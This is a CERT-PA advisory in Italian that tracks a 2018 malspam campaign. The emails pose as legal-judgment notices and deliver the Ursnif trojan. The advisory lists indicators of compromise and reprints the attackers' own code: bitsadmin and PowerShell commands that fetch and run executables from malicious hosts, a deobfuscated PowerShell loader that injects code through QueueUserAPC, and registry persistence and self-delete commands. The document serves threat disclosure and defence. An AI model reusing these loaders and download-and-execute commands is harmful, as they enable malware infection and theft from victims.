Campagna di malspam con finti riferimenti e contenuti di sentenze legali

03/08/2018

italia malspam malware

Gli autori della campagna qui descritta, per attirare l’attenzione dei destinatari, utilizzano contenuti giuridici in riferimento ad ipotetiche relazioni di sentenze inviate da falsi avvocati.

L’utente viene invitato ad aprire un collegamento internet presente nel corpo del messaggio, per scaricare un archivio in formato zip. Tale file contiene un file immagine, con scopo di diversivo, e un file con estensione vbs che è incaricato di innescare la catena di infezione.

Il download dell’allegato, tramite il collegamento nel corpo del messaggio, avviene solo se richiamato da sistemi operativi Microsoft.

Tentando l’apertura del collegamento da sistemi operativi non Windows, non viene effettuato il download ma viene visualizzata una pagina web come quella di seguito rappresentata:


La campagna di malspam è finalizzata a diffondere URSNIF, un malware bancario già rilevato in quanto ampiamente diffuso tramite campagne di malspam veicolate anche con l’ausilio di botnet.
Di seguito i due casi rilevati:

Caso 1 (1 Agosto 2018)

Indicatori mail:

  • Da: Biondello Cecala [mailto:Cecala8743@saybees.com]
  • Inviato: mercoledì 1 agosto 2018 12:03
  • Oggetto: Relata di notifica sentenza N.116548351436 Del 14/06/2018

Il collegamento internet “Atti” punta alla url “http://www.narghast[.]com/zgpa?mvh=29293” per scaricare il file “Nuovo doc1.zip” che contiene la cartella “Nuovo doc1” e all’interno i file “info1.jpg” e “Nuovo doc1.vbs” come da immagine seguente:

L’immagine “info1.jpg” non ha componenti malevoli ma viene inserita probabilmente con l’intento di far apparire la comunicazione lecita. Di seguito un estratto contiene:

Caso 2 (3 agosto 2018)

Indicatori mail:

  • Da: Paris Ferrini [mailto:Ferrini7355@sfsheriffactivityleague.com]
  • Inviato: venerdì 3 agosto 2018 10:33
  • Oggetto: Relazione di notifica sentenza N°67989362678 Del 11/05/18

Il collegamento internet “Sentenza” punta alla url “http://www.nvqiqi[.]com/hgytbmu?edrf=252787” per scaricare il file “Nuovo doc3.zip” che contiene la cartella “Nuovo doc3” e all’interno i file “help7.jpg” e “Nuovo doc3.vbs” come rappresentato di seguito:

Il contenuto del file “help7.jpg” è identico al file “info1.jpg” riferito al caso 1.

Indicatori di compromissione malware:

Caso 1

Da un’analisi il codice VBScript puntava a scaricare un eseguibile attraverso una richiesta alla url “http://seamscrazy[.]com/pageredx12.php” per scaricare il file “JYZZyDcXxd.exe”.
Al momento delle analisi la risorsa era indisponibile pertanto non sono state possibili ulteriori verifiche sulla catena di infezione e sulla tipologia di malware.

Caso 2

Dalle analisi è emerso che il file VBS, una volta decodificato, provvede a lanciare il comando seguente:

“cmd.exe /c bitsadmin /transfer msd5 /priority foreground http://thebodhitreeshop.com/pagtyre27.php %TEMP%/pwwnYfCXsO.exe &schtasks /create /st 10:11:10:11 /sc once /tn srx3 /tr %TEMP%/pwwnYfCXsO.exe”

Il comando avvia “bitsadmin” che provvede a scaricare localmente il file “pwwnYfCXsO.exe” dalla risorsa “http://thebodhitreeshop[.]com/pagtyre27.php” quindi fornisce parametri al processo di Windows “schtasks.exe” per programmare temporalmente l’esecuzione del file malevolo di seguito caratterizzato:

Da analisi sul file è emerso un ulteriore file PE integrato con una tecnica simile al “process hollowing” e di cui si riportano i dettagli:

NOTA: Da ricerche CLOSINT emerge che in relazione agli import hash sopra indicati esistono recenti “sample” associati alle tipologie di malware Ursnif e GandCrab.

Da analisi, tutt’ora in corso sul PE emerge l’utilizzo dell’indirizzo IP 195[.]123.212.153 ubicato in Lettonia per scaricare aggiuntivi componenti malevoli o come server di comando e controllo.


Conclusioni

La campagna di diffusione risulta in corso a danno di utenze italiane, sia su caselle di posta convenzionale che PEC.
L’utilizzo di riferimenti legali e giuridici all’interno del messaggio potrebbe attirare l’attenzione di incauti utenti ed agevolare la diffusione del malware.
Da quanto emerso, in concomitanza del manifestarsi della campagna di diffusione, il fattore di riconoscimento dei file VBS da parte degli Antivirus è considerevolmente basso.
Si consiglia pertanto di provvedere all’adozione idonee misure di sicurezza eo note informative sul caso indicato.


Aggiornamento

A fronte di ulteriori evidenze ricevute, si riportano ulteriori indicatori che dalle analisi in corso sono riconducibili alla diffusione del malware nelle modalità indicate nel Caso 2 (Nuovo doc3.zip):

Oggetto e-mail: Relazione di notifica sentenza N° 52622588966 Del 13/06/2018”*

Drop URL:

  • http://www[.]ricercarfashion[.]com/xcrvkkr?blp=76887
  • http://www[.]rendercaracas[.]com/tojz?tggc=8051
  • http://www[.]infodominoterpercaya[.]com/oocx?aah=69874
  • http://www[.]laststophobbies[.]com/pnqrfj?qyug=113480
  • http://www[.]colegiodelaconquista[.]com/hpquece?ppmk=16051
  • http://www[.]99-66-33[.]com/kgpsg?ekyv=9202
  • http://www[.]writersprofitcenter[.]com/nobk?uozwc=12792
  • http://www[.]fruisty[.]com/xqazp?hnu=19444
  • http://www[.]ricercarfashion[.]com/xcrvkkr?blp=76887
  • http://www[.]djanatol[.]com/uvroy?vlun=66309
  • http://www[.]popularattractions[.]com/uzzzu?evod=65939
  • http://www[.]bowl-pro[.]com/mlacjnf?uqaqu=38663

Mittenti:

  • Castagnola499@sfdscf[.]com
  • Fiorilli738@sfdscf[.]com
  • Vadala61@saybees[.]com
  • siravo5945@saybess[.]com
  • Macchione35@saybees[.]com
  • Piscitello445@saybees[.]com
  • Belluomini93@dasayf[.]com
  • Scaletta43@dasayf[.]com
  • Troiani9371@dasayf[.]com
  • Alioto988@dasayf[.]com
  • Petruzzelli5955@dasayf[.]com
  • Console869@sfsheriffactivityleague[.]com

* l’oggetto delle mail contempla una parte fissa “Relazione di notifica sentenza” ed una variabile costituita da un ipotetico numero di sentenza e la relativa data.


Aggiornamento del 06/08/2018 – (Dettaglio analisi malware)

Il CERT-PA ha compiuto un’ulteriore analisi del payload caricato dal malware tramite la tecnica di process hollowing descritta sopra, di seguito sono riportate le principali attività riscontrate.

Il malware decifra la propria sezione PE .bss, l’algoritmo usato è una lunga sequenza di operazioni binarie come XOR, rotazioni e simili. Una parte della chiave usata in questo processo consiste della stringa “Jul 31 2018”.
La sezione .bss decifrata contiene una lista di stringhe tra cui: nome di DLL e API da importare, tabelle per la cifratura dei dati trasmessi e ricevuti, stringhe di formato (printf) per la generazione degli URL, stringhe per le chiavi di registro modificate.

Successivamente il malware modifica le chiavi di registro usate da Internet Explore per mostrare il popup di benvenuto al primo avvio e per il salvataggio automatico dei file scaricati.
A seguito viene creata un’instanza dell’oggetto COM “InternetExplorer.application”, lo scopo è quello di usare l’automazione fornita da Internet Explorer per il download di componenti aggiuntivi; le operazioni descritte in apertura di paragrafo hanno lo scopo di rendere invisibili all’utente i download.

Il malware raccoglie informazioni come il nome utente e il tempo dall’avvio della macchina, queste sono poi trasformate in una query HTTP; di seguito un esempio ottenuto dalla macchina di analisi:

soft=3&version=217016&user=d8a80f0c43371120c66de827b2413381&server=12&id=1345&crc=1&uptime=86236

Questa stringa, dopo minori manipolazioni, è poi codificata con un algoritmo ad hoc (anch’esso una lunga sequenza di operazioni binarie) ed usata per generare l’URL a cui effettuare la richiesta:

http://195.123.212.153/images/n0ndDFHZKBqkp/qVBFTAsK/ENvxdQaHTt_2BlD_2B9eth_/2FTyedOb_2/Fz49TZOJpVrAziZHe/uoSUFOwUtNNR/NBZp8Yyhp9E/ot1n_2FfnczjT9/g84imoHuNEgReffn3Q5ti/1z4x1otBrK3aV6Nu/bhG3woMEn9kah3r/JvJPpRc8eC6rw0_2F/LcggJc.avi

L’host (195[.]123.212.153) è recuperato dalla sezione .bss, così come il prefisso “images/”, il resto della stringa è la query di prima codificata.

Il malware invia tre richieste in serie, tutte al solito host e la cui query differisce solo per il valore dei parmetri “uptime” e “crc”, quest’ultimo assume i valori 1, 2 e 3.
Per effettuare le richieste utilizza l’automazione COM messa a disposizione da Internet Explorer, creando, per ogni singolo URL, un’instanza di “InternetExplorer.Application”, richiamandovi il metodo “Navigate”, recuperando il contenuto del documento scaricato e poi chiudento l’instanza.

Ognuna di queste richieste scarica un file con estensione AVI ma il cui contenuto è un blob binario codificato in base64.
Il blob viene decodificato con una lunga sequenza di operazioni binarie (probabilmente la solita usata per codificare la query), il risultato è riportato di seguito, in base al valore del parametro “crc”:

  1. DLL a 32 bit
  2. DLL a 64 bit
  3. Script powershell

Questi componenti saranno descritti di seguito.

Successivamente il malware legge la data di creazione del file “c_1252.nls” nella directory di sistema di Windows (%systemroot%system32) e utilizza tale data per enumerare tutte le DLL nella stessa directory che non siano state create successivamente alla data di “c_1252.nls” più un giorno.
Lo scopo di questa enumerazione è quello di prendere i primi quattro caratteri del nome di sei di queste dll per generare tre stringhe casuali.
Le DLL sono scelte in base al loro ordine, ad esempio la prima stringa è generata prendendo la 41nesima e la 116esima dll (Nella macchina di analisi le stringhe generate sono state: “Authstui”,
“blb_drt” e “cngaergy”).

Il malware seleziona una delle due DLL di cui sopra in base alla versione di Windows in uso, poi scrive nei primi cinque bytes l’opcode (0e9h) per un salto relativo verso l’entry point del payload.
Questa dll è infine convertita in una rappresentazione testuale di un array di byte al fine di essere iniettata nel codice powershell scaricato.

Tale codice è:

$jahfcc="xrkfwiuctyp";function lyujifwuxv{[System.Convert]::FromBase64String($args[0]);};function vcyswge{$rcdftbok=lyujifwuxv($args[0]);[System.Text.Encoding]::ASCII.GetString($rcdftbok);};
iex(vcyswge("DQokcWJodXRodnJteWY9IltEbGxJbXBvcnQoYCJrZXJuZWwzMmAiKV1gbnB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBHZXRDdXJyZW50UHJvY2VzcygpO2BuW0RsbEltcG9ydChgImtlcm5lbDMyYCIpXWBucHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFZpcnR1YWxBbGxvY0V4KEludFB0ciB3d2osSW50UHRyIGx4ZmZvZm8sdWludCBhb2NvbmNtLHVpbnQgaXVrLHVpbnQgaHdzaXZ1cm9qKTsiOyR4dWlzdnV0Z2tnbz1BZGQtVHlwZSAtbWVtYmVyRGVmaW5pdGlvbiAkcWJodXRodnJteWYgLU5hbWUgJ3F5YWFleGNpZ20nIC1uYW1lc3BhY2UgV2luMzJGdW5jdGlvbnMgLXBhc3N0aHJ1Ow0KJHVqcHBtZnV1aWs9IltEbGxJbXBvcnQoYCJrZXJuZWwzMmAiKV1gbnB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBHZXRDdXJyZW50VGhyZWFkSWQoKTtgbltEbGxJbXBvcnQoYCJrZXJuZWwzMmAiKV1gbnB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBPcGVuVGhyZWFkKHVpbnQgeHdvY2R4LHVpbnQgYWRmbGd2dCxJbnRQdHIgeGJ4ZSk7YG5bRGxsSW1wb3J0KGAia2VybmVsMzJgIildYG5wdWJsaWMgc3RhdGljIGV4dGVybiB1aW50IFF1ZXVlVXNlckFQQyhJbnRQdHIgaWphcSxJbnRQdHIgdHdzeHhteWVibSxJbnRQdHIgeGZuZ2dkY24pO2BuW0RsbEltcG9ydChgImtlcm5lbDMyYCIpXWBucHVibGljIHN0YXRpYyBleHRlcm4gdm9pZCBTbGVlcEV4KHVpbnQgb2NxeGFwLHVpbnQgY3B2b2V1ZW4pOyI7JGVlaWh3eGpxPUFkZC1UeXBlIC1tZW1iZXJEZWZpbml0aW9uICR1anBwbWZ1dWlrIC1OYW1lICdidGRwbWlpamVnJyAtbmFtZXNwYWNlIFdpbjMyRnVuY3Rpb25zIC1wYXNzdGhydTsNCj=="));
[byte[]]$tbffxbyimys=@(@CODE@);
iex(vcyswge("DQppZigkamlhPSR4dWlzdnV0Z2tnbzo6VmlydHVhbEFsbG9jRXgoJHh1aXN2dXRna2dvOjpHZXRDdXJyZW50UHJvY2VzcygpLDAsJHRiZmZ4YnlpbXlzLkxlbmd0aCwxMjI4OCw2NCkpe1tTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuTWFyc2hhbF06OkNvcHkoJHRiZmZ4YnlpbXlzLDAsJGppYSwkdGJmZnhieWlteXMubGVuZ3RoKTtpZigkZWVpaHd4anE6OlF1ZXVlVXNlckFQQygkamlhLCRlZWlod3hqcTo6T3BlblRocmVhZCgxNiwwLCRlZWlod3hqcTo6R2V0Q3VycmVudFRocmVhZElkKCkpLCRqaWEpKXskZWVpaHd4anE6OlNsZWVwRXgoMSwxKTt9fQ0K"));

che deoffuscato è

$assembly1="
	[DllImport(`"kernel32`")]
	public static extern IntPtr GetCurrentProcess();
	[DllImport(`"kernel32`")]
	public static extern IntPtr VirtualAllocEx(IntPtr wwj,IntPtr lxffofo,uint aoconcm,uint iuk,uint hwsivuroj);";
	
$assembly1Type=Add-Type -memberDefinition $assembly1 -Name 'qyaaexcigm' -namespace Win32Functions -passthru;

$assembly2="
	[DllImport(`"kernel32`")]
	public static extern IntPtr GetCurrentThreadId();
	[DllImport(`"kernel32`")]
	public static extern IntPtr OpenThread(uint xwocdx,uint adflgvt,IntPtr xbxe);
	[DllImport(`"kernel32`")]
	public static extern uint QueueUserAPC(IntPtr ijaq,IntPtr twsxxmyebm,IntPtr xfnggdcn);
	[DllImport(`"kernel32`")]
	public static extern void SleepEx(uint ocqxap,uint cpvoeuen);";
	
$assembly2Type=Add-Type -memberDefinition $assembly2 -Name 'btdpmiijeg' -namespace Win32Functions -passthru;

[byte[]]$PEPayload_withJumpEP=@(@CODE@);

if ( $buffer = $assembly1Type::VirtualAllocEx($assembly1Type::GetCurrentProcess(),0,$PEPayload_withJumpEP.Length,12288,64))
{
	[System.Runtime.InteropServices.Marshal]::Copy($PEPayload_withJumpEP,0,$buffer,$PEPayload_withJumpEP.length);
	
	if( $assembly2Type::QueueUserAPC($buffer, $assembly2Type::OpenThread(16,0,$assembly2Type::GetCurrentThreadId()),$buffer))
	{
		$assembly2Type::SleepEx(1,1);
	}
}

Si noti il placeholder "@CODE@" che verrà sostituito con i bytes del payload.

Come si evince, a parte la creazione al volo di due assembly .NET per l'accesso alle API, lo scopo di questo script è allocare un buffer nel processo chiamante, copiarvi il payload e poi eseguirlo tramite una APC con entry-point al primo byte del buffer (da cui la necessità del salto inserito sopra).

Una volta generato lo script, esso e le due dll (cifrate) sono scritte nelle seguenti chiavi di registro:

  • HKCUSoftwareAppDataLowSoftwareMicrosoft{GUID}

dove {GUID} è un GUID generato dinamicamente (non si è ritenuto interessante analizzare nel dettaglio l’algoritmo).
La stringa “blb_drt” generata precedentemente è usata nominare la chiave dove è salvato lo script PowerShell, mentre le due DLL sono salvate nelle chiavi “Client32” e “Client64”.

Successivamente il malware si assicura la persistenza creando la chiave “authstui” (nel caso della macchina di analisi, questa è una delle stringhe generate dinamicamente) in

  • HKLMSoftwareMicrosoftWindowsCurrentVersionRun

con valore

cmd.exe /C powershell invoke-expression([System.Text.Encoding]::ASCII.GetString((get-itemproperty 'HKCU:\Software\AppDataLow\Software\Microsoft\29D15240-74E8-43F9-C66D-E8275AF19C4B').blb_drt))

dove “29D15240-74E8-43F9-C66D-E8275AF19C4B” è il GUID di cui sopra e “blb_drt” è la stringa dinamicamente generata che contiene lo script PowerShell.

Lo scopo di questo nuovo script è quello di eseguire il payload in “blb_drt”.

Infine, il malware si cancella con il comando “ping localhost -n 10 && del {percorso_malware}”, l’utilizzo di tale comando sembra essere motivato dalla necessita di evitare di essere segnalato da software di analisi comportamentale.

Giunti al termine, il malware si termina.

Analisi dei due payload, eseguiti a partire dallo script PowerShell, sono ancora in corso ma si riportano di seguito gli indicatori associati:


Aggiornamento del 06/08/2018 – (Nuovi indicatori di compromissione)

Come ulteriore aggiornamento si riporta che, sempre in data odierna, il CERT-PA ha rilevato che la campagna continua con modalità similari a riversarsi su caselle di posta di utenze Italiane.

Il nuovo caso, che si aggiunge ai precedenti, vede la consegna di medesimi messaggi con l’intento di far scaricare il file “Nuovo doc2.zip” contenente il file “Nuovo doc2.vbs” la cui analisi Infosec è già disponibile al link seguente:

Per questo recente caso, gli indicatori di compromissione ad ora emersi sono:

IoC e-mail
Mittente:
Sassano863@sfsheriffactivityleague.com

E-mail drop URL:
http://www.postcardsfrommarsbook[.]com/ljmj?nntwt=100586

IoC Malware
Nome file: Nuovo doc2.vbs
MD5: 8e7ebcbe0d1659d6e5b9ce9ee419727f
SHA1: 892246175ea311e86b94391d11682d66371ab95a
SHA256: c544bf4d2d44c6807ad93ebc9feb2bc1c67474d4f8ef5c7d783113a0c75a159d

IoC network
http://docbackgroundcheck.com/pagehurb573.php
IP Address: 198[.]54.116.126


Aggiornamento del 06/09/2018 – (Nuovi indicatori di compromissione)

L’allegato dell’e-mail è sempre un archivio ZIP contentente un’immagine e un file vbs.
L’immagine ha il solo scopo di rendere plausibile il contenuto dell’archivio, il file vbs contiene il dropper.
Rispetto alla versione precedente il codice è stato offuscato più pesantemente: una volta deoffuscato lo script occupa circa 7 KiB a fronte dei 37 KiB originali.
Il file offuscato presenta sia tecniche di offuscamento usuali (come l’utilizzo massiccio di istruzioni senza effetti sull’esecuzione) sia alcune tecniche più specifiche di questa variante:

  • Utilizzo degli oggetti COM Msxml2.DOMDocument.3.0 e ADODB.Stream per decodificare una stringa base64 (Msxml2.DOMDocument.3.0 per convertire una stringa codificata in base64 in un buffer di byte ed ADODB.Stream per convertire il buffer in una stringa US-ASCII).
  • Un-folding di costanti (es: scrivere 15 come 6+9 o 1000 come 10+10+10+10+…) e di parametri fuorvianti.
  • Utilizzo di una tecnica personalizzata di cifratura delle stringhe dei comandi che consta di un semplice cifrario a blocchi di 8-bit
    E(m, k) = (m | k) - (m & k)

    (I comandi sono ottenuti decodificando due stringhe base64 per ottenere rispettivamente due stringhe composte da valori separati da “@”, queste sono poi esplose sul separatore “@” ed ogni valore viene decifrato usando il carattere “x” come chiave, i valori sono code-unit US-ASCII che formano due stringhe base64 che decodificate danno i comandi).

Lo script controlla l’esistenza delle seguenti cartelle:

  • C:ProgramDataPanda Security
  • C:ProgramDataTrend Micro
  • C:ProgramDatatk7
  • C:ProgramDataKaspersky Lab

Se una di esse è presente esegue il comando:

powershell -windowstyle hidden -ExecutionPolicy ByPass -NoProfile Start-BitsTransfer -Source http://reviewsvid.com/pagiget55.php -Destination $env:temphDlqQdIkx.exe; Start-Process $env:temphDlqQdIkx.exe

altrimenti:

cmd.exe /c bitsadmin /transfer msd5 /priority foreground http://reviewsvid.com/pagiget55.php %TEMP%/hDlqQdIkx.exe &schtasks /create /st 88:88 /sc once /tn sdld3 /tr %TEMP%/hDlqQdIkx.exe

In entrambi i casi viene scaricato un payload da http://reviewsvid.com/pagiget55.php (lato server è controllato che l’user agent sia quello dell’utility bitsadmin, es: “Microsoft BITS/7.0”) e poi viene eseguito.

Da analisi automatiche il payload eseguito risulta essere invariato.

IoC e-mail
Mittente: Scalzo8561@afghankabobhousearlington.com

E-mail drop URL
http://www[.]eatmydirtyass[.]com/qzmjp?ldmj=113265

IoC Malware
Nome file: Nuovo documento1.vbs
MD5: 05939a3969081277ae255989308662ab
SHA1: d7056748b79d97cf30d18c16b5e6c53df13c8fac
SHA256: 689eb09e0fded9eabe53af7526e7612abfe19c39dd03990c00e54541d9fd42fb

Nome file: pagiget55.php
MD5: 08bee89d1c886b881cba00931432763f
SHA1: a5d2e21830bf139fa193ea6812215a5d5a61e8ec
SHA256: 4e2ec5cd3abf7e7ee346b44303b53379b3915d9640a173dd1c393caf6d006768

IoC network
http://reviewsvid[.]com/pagiget55[.]php
IP Address C&C: 195[.]123.237.123


Aggiornamento del 11/09/2018 – (Nuovi indicatori di compromissione)

In data odierna il CERT-PA ha avuto evidenza della presenza di nuovi repository che ospitano il malware per la campagna Ursnif rivolta a utenze Italiane.

La mail presenta gli stessi contenuti delle precedenti e il file (vbs) allegato, simile a quello rilevato nell’aggiornamento del 06/09/2018, aggiunge un ulteriore controllo alla lista delle cartelle da monitorare:

  • C:ProgramDatamb

Successivamente il dropper provvede a scaricare il malware dal dominio “http://musizer.com/pagiget55.php” e schedula un task esattamente 7 minuti dopo l’esecuzione dello script Vbs.

  • FormatDateTime(DateAdd(“n”,7,Time()),4)

Alla funzione “FormatDateTime” viene passato il valore 4 che indica il formato vbShortTime (hh:mm), mentre la funzione “DateAdd” aggiunge 7 minuti “time” acquisito dalla macchina in cui è stato eseguito.

IoC Malware
MD5: 44f1790162c2573b4c359c76a22e95e7
SHA1: 5fbc6e80abf222c30fa35919ebdf16780cca68b5
SHA256: c273480a893a7ee6b6555f3c5b7118a9afff7206dad7c7a1600b2a1cd9967812

IoC network
http://musizer[.com/pagiget55.php
198[.]54.116.126


Aggiornamento del 19/09/2018 – (Nuovi indicatori di compromissione)

Dalle segnalazioni ricevute emerge che la campagna, nonostante abbia subito rallentamenti o intermittenze nella diffusione, è ancora attiva e percorre in linea di massima le stesse logiche già descritte in precedenza.


Dai nuovi casi, come quello sopra rappresentato, il CERT-PA fornisce ulteriori indicatori di compromissione rilevati in relazione ai recenti attacchi:

IoC e-mail
Mittente: Savo13@agehasushinyc.com

E-mail drop URL

http://www.homecover247[.]com/jopyyhv?tdza=212913
http://www.ccr44[.]com/ezrfonn?fxhb=76008

IoC Malware
Nome file: Nuovo documento1.vbs
MD5: c02a24cf59d075e59c0838eb02a0742a
SHA1: 4c67ef10677876bea93c509c4c09eab26b62ef1e
SHA256: c076c5a2fbc47265237a0b69debb6f49de5c22a1a351e468800a4f71f800d37b

Nome file: Nuovo documento1.vbs
MD5 0abe4a847c2b76d74ea539c31acc6b99
SHA1 c3dd28a2a5970d56aac3098e88cb980779c2fb27
SHA256 e28d4fc0c71104b7c4bdfdf357737336451d64c016d700e5b670bbedc7bc5a2c

Nome file: pagigpy75.php
MD5: 02091f4e55f08ff358f60c7c28207b79
SHA1: efedea39acb2df51a95824c03c60d75b6b5eac02
SHA256: e333f7356bd0d2a5e97864bf588dd9c2474fa143036c13939219f9b6f547cc20

IoC network

http://mvivacr[.]com/pagigpy75.php
http://conveniencecannabis[.]com/pagigpy75.php
IP Address C&C: 198[.]54.114.211


Aggiornamento del 09/10/2018 – (Nuovi indicatori di compromissione – fonte Yoroi e CERT-PA)

In data odierna il CERT-PA ha avuto evidenza di una nuova diffusione della campagna di malspam con finti riferimenti e contenuti di sentenze legali, già analizzata nei mesi presenti. La mail presenta link che puntano a documenti pdf su Google Drive che inducono al download e all’esecuzione di malware della famiglia Trojan/Ursnif.

Il file pdf ospitato sulla piattaforma “Google Drive” presenta al suo interno un ulteriore link come rappresentato in figura:

Come osservato anche dai ricercatori di Yoroi nell’Early Warning N031018, cliccando su link Scarica il documento qui viene eseguito il download di “Nuovo documento 1.zip” contenente script vbs malevoli in grado di installare varianti malware della famiglia Trojan/Ursnif. In questo modo gli attaccanti riescono a bypassare controlli di sicurezza tradizionali sulle comunicazioni in ingresso.

Indicatori di compromissione individuati (fonte Yoroi e CERT-PA)

Malspam:

Relata di notifica atto N.9491385473 Del 11/07/18 (o varianti)

Dropurl:

hxxps:// drive.google.[com/file/d/14INdiQU0T4ekU5dVQdm7zGhTjnaxlakB/view

hxxps:// drive.google.[com/file/d/1VMkFYaD-BGDGhyNoOlG78pyBRHp4fZWM/view?usp=sharing

hxxp:// burypo.gihealthrecords[.info/jkfwefbgdkj=kshlw?pbba=2

hxxp:// burypo.giondemanduniversity[.com/pagjfut54.php

hxxp:// adur.abitinoscateringmidtownwest[.com/jdfbgdergrglw?orea=2

C2 (ursnif):

load.kapswholesale[.com

pool.jfklandscape[.com

hxxp:// 93.179.68[.182/images/

Hash:

7ace3d42ef11b44ac0ed688b662722febf8d272cf490e66504d97ee362f6411c vbs

3de58246d88d6bf3b2e042098caa14dccccab39c37e78888ed33bc4016caae54 zip

7a4d40b9baf389d09eee6e02af126477bf8b24afcbea79a179b45121b7a6210b exe


Aggiornamento del 16/10/2018 – (Nuovi indicatori di compromissione)

Il CERT-PA sta rilevando che la campagna in oggetto continua a coinvolgere caselle di posta nel contesto nazionale e nell’intento di diffondere malware della famiglia URSNIF.

In relazione alle ultime 24 ore si condividono indicatori di compromissioni rilevati a seguito di segnalazioni direttamente pervenute alla nostra attenzione.

Caso 1

  • Mittente: “Justina Restaino” [Restaino8117@healthychoicenyc.com]
  • Da: host31.healthychoicenyc.com (185.172.59.172)
  • Soggetto: Relazione di notifica decreto N.9619567626 Del 15/08/18
  • Payload delivery URL: https://drive.google[.]com/file/d/1Auts8Zt2-hKGwwbVNj7yIf1uSLjjDvLG/view?usp=sharing

Caso 2

  • Mittente: “Ruggerio Ianni” [Ianni46@healthkingmidtown.com]
  • Da: host30.healthkingmidtown.com (185.34.40.190)
  • Soggetto: Relazione di notifica decreto N°19291213773 Del 02/08/18
  • Payload delivery URL: https://drive.google[.]com/file/d/1ZnjbOkd67O7c6gBVpXMvmNHOWDeHU7Mv/view?usp=sharing

Caso 3

  • Mittente: “Genovese Gilberti” [Gilberti97@healthychoicenyc.com]
  • Da: host20.healthychoicenyc.com (185.142.27.165)
  • Soggetto: Relata di notifica decreto #6113286959 Del 15/08/2018
  • Payload delivery URL: https://drive.google[.]com/file/d/1rLe1P6jlFvBsShjUVNoDUGMyrmS-381p/view?usp=sharing

Caso 4

  • Mittente: “Amedeo Panno” [Panno929@healthkingnyc.com]
  • Da: host32.healthkingnyc.com (185.34.40.58)
  • Soggetto: Relazione di notifica atto N.349378422363 Del 15/07/18
  • Payload delivery URL: https://drive.google[.]com/file/d/1SvfLu8IN-6b56HlS_2uNbgxxGfbgT9ph/view?usp=sharing

In riferimento ai casi cui sopra, l’eventuale apertura della URL in Google Drive quindi dall’immagine precedentemente rappresentata si invita l’utente a scaricare un documento malevolo sito nella risorsa seguente:

  • http://nut[.]72ndstreetbagel[.]com/jkfwefbjguu=w?pbba=2

Dalla stessa nelle ultime 48 ore sono stati diffusi gli archivi “Nuovo documento 2.zip”contenenti malware e contraddistinti dagli SHA256 seguenti:


Aggiornamento del 25/10/2018 – (Nuovi indicatori di compromissione – fonte Yoroy – CERT-PA)

Dalle segnalazioni ricevute emerge che la campagna è ancora attiva. Come nell’ondata precedente, anche in questo caso il malware viene veicolato attraverso l’apertura di documenti pdf ospitati sulla piattaforma Google-Drive contenente un collegamento alle infrastrutture di scaricamento malware.

Si condividono i nuovi indicatori di compromissione:

Oggetto malspam:

  • “Relata di notifica sentenza #<10NUM> Del DD/MM/18”
  • “Relazione di notifica sentenza #795239272953 Del 14/08/18”
  • “Relata di notifica atto N.392789573723 Del 13/08/2018”

Mittenti:

  • Santaniello11@holechanphilly.com
  • Bozza8712@hobokenburritonyc.com
  • @hobokengourmetcatering .com
  • @healthychoicenyc .com
  • @healthychoicekitchenbushwick .com
  • @holechanphilly .com
  • @hobokenburritonyc .com
  • @healthkingmidtown .com
  • @healthfullyorganicmarketnyc .com
  • @holeycreamnyc .com
  • @hobokenburritonyc .com
  • @hobokengourmetcatering .com
  • @hollywoodchicshollywood .com

Dropurl:

  • hxxps ://drive.google[.com/file/d/1nmXBN6clkUNByRiNXIvqEJeyxygQLORS/view
  • hxxps ://drive.google[.com/file/d/1czUcMDCAQe1COhkN59zbMsBscr3RCjTL/view
  • hxxps ://drive.google[.com/file/d/1Dj787P7vlyM51nDhc_mI9HJ1pO_UF1n9/view
  • https://drive.google.com/file/d/1ftykOiYvjvTKN3lubfdTwal3Q7RENkSd/view?usp=sharing
  • https://drive.google.com/file/d/1Z7OCdSdrvyHtF_7g352F5by_wlooVHXd/view?usp=sharing
  • hxxp:// nupp.810delicafe[.com/jogptfbuu=w?bba=1
  • hxxp:// kiki.33gourmetdelinyc[.com/pagjfut54.php
  • kiki.33gourmetdelinyc[.com
  • nupp.810delicafe[.com
  • nopp.ajisaijapanesenyc[.com
  • mino.aghapyfoodridgewood[.com

C2 (ursnif):

  • 195.123.237[.165
  • loads[.smallworld-parties[.com
  • hxxp:// loads.smallworld-parties[.com/images/

Hash:

  • 66d7b726ccc02c873d947b9b9968664dd7b1eaf534edc84138bbc67dc2977749 zip
  • c480986ec7bd8cf2dcba58e2f5e8c90345f2a478aec07405273f7112a72baab7 vbs
  • 07ec43f438865d3b5e91b6e49de15c44023ad48ee86acfb84b8618f87b6e932c exe

Aggiornamento IoC

Si riportano di seguito gli IoC al  25/10/2018

IoC (.txt) – File globale : Mittenti, Oggetti Mail, Drop URL, Ioc Network, C2, hash file (SHA256)

IoC (HASHr.txt) – Lista dei soli hash file da utilizzare in combinazione con il tool HASHr